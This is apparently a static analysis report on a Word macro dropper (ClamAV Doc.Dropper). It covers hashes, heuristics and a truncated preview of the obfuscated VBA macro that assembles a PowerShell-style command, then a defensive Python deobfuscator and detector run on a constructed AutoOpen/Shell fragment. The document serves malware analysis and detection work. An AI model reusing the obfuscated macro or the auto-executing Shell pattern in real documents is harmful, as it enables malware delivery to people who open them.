Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eeb52ebb1db95a6c…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 234.5 KB
Created: 2018-06-25 09:52:00
Authoring application: Microsoft Office Word
First seen: 2018-07-27
MD5: a14d011a9821ee621924b25f4089bdd4
SHA-1: 7103792e005c6ac3358abfdef00b2f19ebe24891
SHA-256: eeb52ebb1db95a6cb4b558e4a7f8c41d674294e85ab847e81b6a056b34baba1b
Risk score: 242

Malware Insights

MITRE ATT&CK
T1204.002 User Execution: Malicious File
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a Word OLE document carrying a VBA macro project. Three findings drive the verdict: the macro source contains a Shell() call (OLE_VBA_SHELL, critical), it defines an AutoOpen entry point (OLE_VBA_AUTOOPEN, high), and the compiled p-code stream pairs an auto-execution token with shell/download/object-execution tokens (OLE_VBA_PCODE_AUTOEXEC_EXEC, high), so the command runs as soon as the document is opened with macros enabled. ClamAV independently flags the file as Doc.Dropper.Agent-6590375-0, which is consistent with a dropper. The extracted source (Script preview below) is heavily obfuscated: the function VhiXNiAhBlq() interleaves padding assignments (arithmetic on undeclared names, kept from raising errors by On Error Resume Next) with string fragments that are glued together with "+" and Chr() into a single command string; the recoverable prefix "...Hell  -join ((98,49 , 44 , 1 , ..." is consistent with a PowerShell one-liner that rebuilds its real payload from an integer array at run time. The decoding step and the Shell() invocation itself lie beyond the truncated preview, so the final command line and any download location are not recoverable from this page. Two findings should not be read as indicators: the only extracted URL is the standard DrawingML schema namespace that Office writes into drawing parts, and the legacy WordBasic marker is, by its own description, raised when no modern VBA project is recovered, which conflicts with the VBA project recovered here.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6590375-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6590375-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro source contains a Shell() call, i.e. it hands a command line to the operating system for execution.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    An AutoOpen procedure is defined, so the macro runs when the document is opened (once the user enables macros).
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that a modern VBA project was in fact recovered from this sample (see Extracted artifacts), so this marker adds little beyond the VBA findings above.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is the standard DrawingML schema namespace that Office embeds in drawing parts, not a network indicator or command-and-control address.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13668 bytes
SHA-256: 5d0db7716e00fdb4efc28413f8081f0f23469b9ac88be61d09491aa1977a1cf3

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "oQzanwYWw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KbuiUkSaopBW"
Function VhiXNiAhBlq()
On Error Resume Next
Ajbadj = (39068 / CBool(73181) + 39209 + CSng(zwwuY) * (58831 - wjWosF + 30324 - CLng(iEmwK)))
swAVoK = CByte(23542 * Tan(89958) / 92809 + CLng(wVNNt * 28451 * 14990 * Chr(98428)))
iSJYbCj = "Hel" + "l  -j" + "oin " + Chr(40) + Chr(40) + "98,49 ," + " 4" + "4 , 1 , " + "123 ,4" + "0 , " + "35 " + ", "
HHzXnI = (50707 / CBool(22934) + 10762 + CSng(fhpJNG) * (96899 - ZkUjDn + 14967 - CLng(WsBbPw)))
DDqtbN = CByte(24987 * Tan(27512) / 96858 + CLng(wQhHL * 99423 * 14898 * Chr(91525)))
zBCUbNHikWj = "49, 107 " + ",41 ,3" + "6 " + ",44 , 35" + " ," + "37 ,50" + " ,102" + ",8 ,3" + "5," + " 50" + ", 104 " + ", 17 , "
iOYaD = (22939 / CBool(29349) + 91977 + CSng(hKiiiu) * (74354 - WMWiM + 42312 - CLng(ZHWak)))
sufzN = CByte(46800 * Tan(57876) / 54412 + CLng(hMRbjo * 54080 * 26329 * Chr(65631)))
okPwpO = "35, 36 " + ",5 ," + "42, 47," + "35 , " + "40 ," + " 50 " + ", 125," + " 98," + "54, 50," + "4,123 , " + "97 , 46," + "50, "
UFcvYj = (43755 / CBool(86304) + 5834 + CSng(wpoLa) * (78663 - zlVWI + 58448 - CLng(iKRkph)))
tooPFQ = CByte(97554 * Tan(12940) / 26839 + CLng(fbbqsX * 11371 * 617 * Chr(83875)))
ziiDhzzplja = "50 , " + "54 ," + " 124," + "105 ," + "105" + ", 37,"
dcNQL = (51383 / CBool(86213) + 32538 + CSng(SlDVC) * (4432 - AvVYR + 85241 - CLng(iqhCt)))
mLkzJU = CByte(33180 * Tan(52123) / 46535 + CLng(fXhsv * 9705 * 53965 * Chr(10898)))
NZXiMzzimtA = "41" + ", 43," + " 54, 52" + " , 35 " + ",39, " + "42 ,43 " + ",104 ," + " 40,3"
oqXJf = (36200 / CBool(13754) + 70664 + CSng(iZiXz) * (58903 - GBFMil + 50947 - CLng(spBjzb)))
ObiEv = CByte(29907 * Tan(2911) / 10073 + CLng(CkLszZ * 14105 * 45141 * Chr(6125)))
iGjtwGEpwK = "5," + " 50" + ",10" + "5 , 49 ," + "41 , " + "52 " + ", " + "34, 5" + "4, 52 " + ", 3"
pDWtq = (6865 / CBool(30966) + 90705 + CSng(pRXkd) * (18641 - CtviL + 9910 - CLng(aKwZid)))
iijim = CByte(41292 * Tan(85234) / 65983 + CLng(AfUjPN * 58412 * 98275 * Chr(65405)))
jwPztHmCYR = "5, 53 , " + "53 ,10" + "5 ,119" + ", 49" + ", 9 ,44" + ", 45 , 4" + "6 ," + "35" + " , 31,"
oWNcUF = (69279 / CBool(14462) + 92400 + CSng(sihSzG) * (75521 - CroRUF + 89552 - CLng(rVjMf)))
rzovUB = CByte(23024 * Tan(55957) / 4196 + CLng(wwvWz * 4456 * 70326 * Chr(17389)))
vPrlCwIKGiw = "3, 126 " + ",105" + ", 6, 46" + ",50" + ", 50, 54" + ",12" + "4,105 " + ", " + "105" + ", 49,49,"
mwquWC = (16695 / CBool(64425) + 32540 + CSng(ObjDt) * (75695 - dDmlfZ + 79907 - CLng(VVJYFp)))
XmsCAF = CByte(33642 * Tan(86676) / 22942 + CLng(vPnmM * 90225 * 4896 * Chr(67345)))
uXdNIdLS = "49 " + ", 104,4" + "7,37 ,36" + ", 104,3" + "7, 42 , " + "105" + " ,28" + ", " + "62,39 , " + "48 ,4"
YhWpH = (45015 / CBool(1409) + 38658 + CSng(hzJLZ) * (57095 - zLqmd + 23587 - CLng(aQkKB)))
IaGpqQ = CByte(7081 * Tan(815) / 94457 + CLng(iAlQLM * 21469 * 68762 * Chr(80754)))
HbEkKoDBwKo = "1,2 , " + "35," + " 1" + "05, 6 " + ",46" + " ,50,5" + "0 ,54 " + ", 124 , " + "105 ,10" + "5 , 49 "
iPjLw = (73917 / CBool(23653) + 44066 + CSng(YWNwjs) * (12986 - UVIaDz + 49208 - CLng(mrvwN)))
AUsEs = CByte(82079 * Tan(91114) / 85948 + CLng(EjDYO * 34159 * 2513 * Chr(8835)))
bZdZTS = ", 49, 49" + " , 1" + "04 , " + "37" + " , 46 , " + "51" + ", 40" + " ," + " 33," + " 37 , 5" + "1, 53 ," + "39"
FUrOh = (69058 / CBool(60043) + 30899 + CSng(zKuQY) * (67325 - WsGbz + 30906 - CLng(bREtzb)))
ulnXt = CByte(86719 * Tan(28167) / 73289 + CLng(IZcjvi * 17620 * 76579 * Chr(16040)))
sfvEXNncf = ",43 ,53 " + ", 41 " + ",52 ," + " 39 " + ", 54,52," + "47,43, 4" + "7 ,35 " + ", "
VhiXNiAhBlq = iSJYbCj + zBCUbNHikWj + okPwpO + ziiDhzzplja + NZXiMzzimtA + iGjtwGEpwK + jwPztHmCYR + vPrlCwIKGiw + uXdNIdLS + HbEkKoDBwKo + bZdZTS + sfvEXNncf
GsYuc = (46637 / CBool(78827) + 45328 + CSng(zdqfo) * (98777 -
... (truncated)
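The obfuscation pattern visible in the preview (padding assignments built from arithmetic on undeclared names, string fragments glued together with "+" and Chr(), a final concatenation returned from the function) and the token co-occurrence logic described for OLE_VBA_PCODE_AUTOEXEC_EXEC, OLE_VBA_AUTOOPEN and OLE_VBA_SHELL can both be exercised on source of this shape. The following Python is an added example written for this page; it is not part of the analysis tool, of oletools, or of the sample. It runs over a short constructed VBA fragment modelled on the preview (the "powershell" prefix and the shortened integer list are invented for the example and were not recovered from the sample), folds pure string concatenations including Chr() calls and references to earlier string variables, identifies assignments that can neither be folded nor are read anywhere else (the padding lines), and then applies an auto-exec plus execution-token check to the raw source and the folded strings together. The auto-exec and execution token lists are the example's own, not the report's exact ones.

```python
import re

# Constructed VBA fragment modelled on the preview above; it is NOT the sample's
# source. The "powershell" prefix and the short integer list are invented here.
SAMPLE_VBA = r'''
Attribute VB_Name = "KbuiUkSaopBW"
Function VhiXNiAhBlq()
On Error Resume Next
Ajbadj = (39068 / CBool(73181) + 39209 + CSng(zwwuY) * (58831 - wjWosF))
iSJYbCj = "pow" + "ersh" + "ell -j" + "oin " + Chr(40) + Chr(40) + "98,49 ,"
swAVoK = CByte(23542 * Tan(89958) / 92809 + CLng(wVNNt * 28451 * Chr(98428)))
zBCUbNHikWj = " 4" + "4 , 1" + Chr(41) + Chr(41)
VhiXNiAhBlq = iSJYbCj + zBCUbNHikWj
End Function

Sub AutoOpen()
    Shell VhiXNiAhBlq(), 0
End Sub
'''

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# One operand or operator of a concatenation: "literal", Chr(n), identifier, or "+".
TOKEN_RE = re.compile(
    r'\s*(?:"((?:[^"]|"")*)"|Chr\$?\(\s*(\d+)\s*\)|([A-Za-z_]\w*)|(\+))', re.I)
PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)',
                     re.I | re.M)

# Procedure names Office runs automatically, and tokens that indicate execution
# or download capability (this example's lists, not the report's exact ones).
AUTOEXEC = {'autoopen', 'auto_open', 'autoexec', 'autoclose', 'auto_close',
            'document_open', 'document_close', 'workbook_open', 'workbook_close'}
EXEC_TOKENS = ('shell', 'wscript.shell', 'createobject', 'powershell', 'cmd.exe',
               'urldownloadtofile', 'xmlhttp', 'callbyname')


def fold_concat(expr, strings):
    """Return the value of expr if it is a pure concatenation of string
    literals, Chr(n) calls and already-resolved string variables, else None."""
    pos, parts, expect_operand = 0, [], True
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            return None                      # arithmetic, parentheses, calls, ...
        lit, code, ident, plus = m.groups()
        if plus:
            if expect_operand:
                return None
            expect_operand = True
        else:
            if not expect_operand:
                return None
            if lit is not None:
                parts.append(lit.replace('""', '"'))   # VBA escapes " as ""
            elif code is not None:
                n = int(code)
                if n > 255:                  # Chr() outside the byte range: not a string
                    return None
                parts.append(chr(n))
            elif ident in strings:
                parts.append(strings[ident])
            else:
                return None                  # undeclared or non-string name
            expect_operand = False
        pos = m.end()
    return ''.join(parts) if parts and not expect_operand else None


def analyse(vba_src):
    strings, unfoldable = {}, []
    for line in vba_src.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, expr = m.groups()
        value = fold_concat(expr, strings)
        if value is None:
            unfoldable.append(name)
        else:
            strings[name] = value
    # An assignment that cannot be folded and whose target is never read again
    # is padding: it only bulks up the source to defeat simple signatures.
    padding = [n for n in unfoldable
               if len(re.findall(r'\b%s\b' % re.escape(n), vba_src)) == 1]
    # Token check over the raw source plus every folded string, so that a name
    # such as "powershell" hidden in fragments still counts.
    haystack = (vba_src + '\n' + '\n'.join(strings.values())).lower()
    autoexec = sorted({p for p in PROC_RE.findall(vba_src) if p.lower() in AUTOEXEC})
    exec_tokens = sorted(t for t in EXEC_TOKENS
                         if re.search(r'(?<![\w.])' + re.escape(t) + r'(?!\w)', haystack))
    return {'strings': strings, 'padding': padding, 'autoexec': autoexec,
            'exec_tokens': exec_tokens,
            'autoexec_with_exec': bool(autoexec and exec_tokens)}


if __name__ == '__main__':
    result = analyse(SAMPLE_VBA)
    for name, value in result['strings'].items():
        print('%-12s = %r' % (name, value))
    print('padding lines :', result['padding'])
    print('auto-exec     :', result['autoexec'])
    print('exec tokens   :', result['exec_tokens'])
    print('verdict       :', result['autoexec_with_exec'])
```

Run stand-alone, the script prints the folded command, the two padding assignments, the AutoOpen entry point and the execution tokens, and a positive verdict. Applied to the real macros.bas, the same folding resolves the string fragments of VhiXNiAhBlq() as far as the preview shows them, but the routine that turns the integer list into the final command is not on this page, so only the "-join ((..." prefix is recoverable here.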